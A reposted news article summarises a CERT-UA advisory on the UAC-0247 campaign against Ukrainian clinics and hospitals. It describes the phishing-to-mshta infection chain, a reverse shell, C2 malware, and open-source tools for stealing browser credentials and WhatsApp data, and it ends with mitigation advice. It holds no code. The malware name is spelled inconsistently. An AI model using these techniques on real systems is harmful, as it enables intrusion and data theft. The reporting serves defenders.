Ukraine’s Computer Emergency Response Team (CERT-UA) has revealed details of a new campaign targeting government and municipal healthcare institutions, primarily clinics and emergency hospitals, distributing malware that can steal sensitive data from Chromium-based web browsers and WhatsApp.
This activity was observed between March and April 2026 and is believed to be caused by a threat cluster known as UAC-0247. The origins of this campaign are currently unknown.
According to CERT-UA, the attack chain begins with an email message purporting to offer humanitarian aid, prompting recipients to click on a link that redirects them to a legitimate website compromised by a cross-site scripting (XSS) vulnerability, or to a fake site created with the help of artificial intelligence (AI) tools.
No matter what the site is, the goal is to download and run a Windows Shortcut (LNK) file and then use the native Windows utility “mshta.exe” to run a remote HTML application (HTA). The HTA file displays a decoy form to distract the victim while fetching a binary that injects shellcode into legitimate processes (such as ‘runtimeBroker.exe’).
“At the same time, recent campaigns have recorded the use of a two-stage loader, the second stage of which is implemented using a proprietary executable file format (with complete support for code and data sections, importing functions from dynamic libraries, and relocation), and the final payload is further compressed and encrypted,” CERT-UA said.
One of the stagers is a TCP reverse shell or equivalent tool, tracked as RAVENSHELL. This tool establishes a TCP connection with the management server and uses “cmd.exe” to receive commands to run on the host.
Infected machines also download a malware family called AGINGFLY and a PowerShell script called SILENTLOOP. This script comes with several features to run commands, automatically update settings, obtain the current IP address of the management server from the Telegram channel, and fall back to an alternative mechanism for determining the command and control (C2) address.
Developed using C#, AINGFLY is designed to allow remote control of affected systems. It uses WebSockets to communicate with the C2 server and retrieve commands, allowing it to execute commands, launch keyloggers, download files, and execute additional payloads.
An investigation of approximately a dozen incidents revealed that these attacks facilitate reconnaissance, lateral movement, and theft of credentials and other sensitive data from WhatsApp and Chromium-based browsers. This is achieved by deploying a variety of open source tools such as those listed below.
ChromElevator, a program designed to bypass Chromium’s App-Binded Encryption (ABE) protection and collect cookies and saved passwords ZAPiXDESK, a forensic extraction tool that decrypts WhatsApp’s local database Web RustScan, a network scanner Ligolo-Ng, a lightweight utility that establishes tunnels from reverse TCP/TLS connections Chisel, a tool that tunnels network traffic over TCP/UDP XMRig, cryptocurrency miner
The agency said there was evidence to suggest that representatives of the Ukrainian Armed Forces may also have been targeted as part of the operation. It is based on the distribution of a malicious ZIP archive via Signal that is designed to drop AINGFLY using DLL sideloading techniques.
To reduce the risks associated with threats and minimize the attack surface, we recommend restricting the execution of LNK, HTA, and JS files, along with legitimate utilities such as ‘mshta.exe’, ‘powershell.exe’, and ‘wscript.exe’.
Source link
